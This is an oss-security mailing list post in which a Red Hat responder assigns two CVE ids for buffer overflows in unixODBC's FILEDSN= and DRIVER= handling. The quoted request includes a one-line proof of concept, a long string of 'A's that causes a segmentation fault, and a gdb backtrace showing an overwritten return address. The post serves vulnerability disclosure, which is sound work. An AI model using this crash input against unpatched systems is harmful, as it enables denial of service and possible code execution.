Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 29 May 2012 11:10:00 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Felipe Pena <felipensp@...il.com>
Subject: Re: CVE id request: Multiple buffer overflow in unixODBC

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 05/29/2012 06:42 AM, Felipe Pena wrote:
> Hi, please assign a CVE id for the issue:
> 
> Multiple buffer overflow in unixODBC ===========================
> 
> The library unixODBC doesn't check properly the input from
> FILEDSN=, DRIVER= options in the DSN, which causes buffer overflow
> when passed to the SQLDriverConnect() function.
> 
> The unixODBC maintainer has been notified about the issue.
> 
> Version affected ============
> 
> FILEDSN= as of 2.0.10 DRIVER= as of 2.3.1
> 
> PoC ===
> 
> $ ./poc "FILEDSN=$(python -c "print 'A'*10000")" Segmentation
> fault
> 
> (gdb) bt #0  0x00007ffff7bc8c81 in SQLReadFileDSN
> (pszFileName=<value optimized out>, pszAppName=<value optimized
> out>, pszKeyName=<value optimized out>, pszString=<value optimized
> out>, nString=<value optimized out>, pnString=<value optimized
> out>) at SQLReadFileDSN.c:207 #1  0x4141414141414141 in ?? ()
> 
> 
> CREDITS =======
> 
> This bug was discovered by Felipe Pena. BugSec Team -
> http://www.bugsec.com.br/

Splitting into two CVE's due to the different versions affected:

Please use CVE-2012-2657 for unixODBC 2.0.10 buffer overflow in FILEDSN=

Please use CVE-2012-2658 for unixODBC 2.3.1 buffer overflow in DRIVER=


- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIbBAEBAgAGBQJPxQLnAAoJEBYNRVNeJnmTiloP+KTgTGtz1zQArKVZLkypLSIf
6ZTpQ4TZCv961JBQjn6aR682hGHFwWbAWehqDNVhJTJ+aolnQqVvNb4r7B+jBNAj
opCQLQ86FyjwLGjh5SP2n38rQIp5mfZHXZJfqugHayD1ovCHXNq6ScaFm2hTwhYp
1sWNZJ9UUYtWjbeILR4PQZuSED8w2+5m6oZRtyZ7FqJSW8e1fMzuYsGImxXXMGTG
CjKOuzizzbtnaPdGVOiL0rolwGDGfqcmaZPCQpg2eYLCuYAtUf2yLhUkiFIsMMOO
JFrlWG00gZtqIDiaIJeeGhWg5BoDNJzaDtuZ1Mg3OtS42tR3wFIzRnCmqjAMLsZa
BSrYa2IczAJIvJPFWOTcHXlHkWmjmhl3K3Dwy04r4gmMvg0wOyeUtf4VdjvbHHQu
IQ0R1vVaVDWlfrq3kGxnB6ZMBJjUdJ41olKjpZB6k5PJWcYI+lfgG8t2diBldZ8Z
gvMn5yiIxTX08ad7doXbmhRp14u06zfNoqHz671G/pcw70DO4Th9oVjrujqrCtyT
JOmb7aWAQu9cGsdP/c3rpL9mrMG7a/e8yc6BOtVi3OQFlGOc8oecqDB0KB2tSeLm
yrgM1lhF7ZScaEMmAiogikiqoLvZy1Ol4niRZTquG/9HkHYatNePFJMhC8GpJqEL
LReUsHTvMoaWsyjUoD8=
=QCpI
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ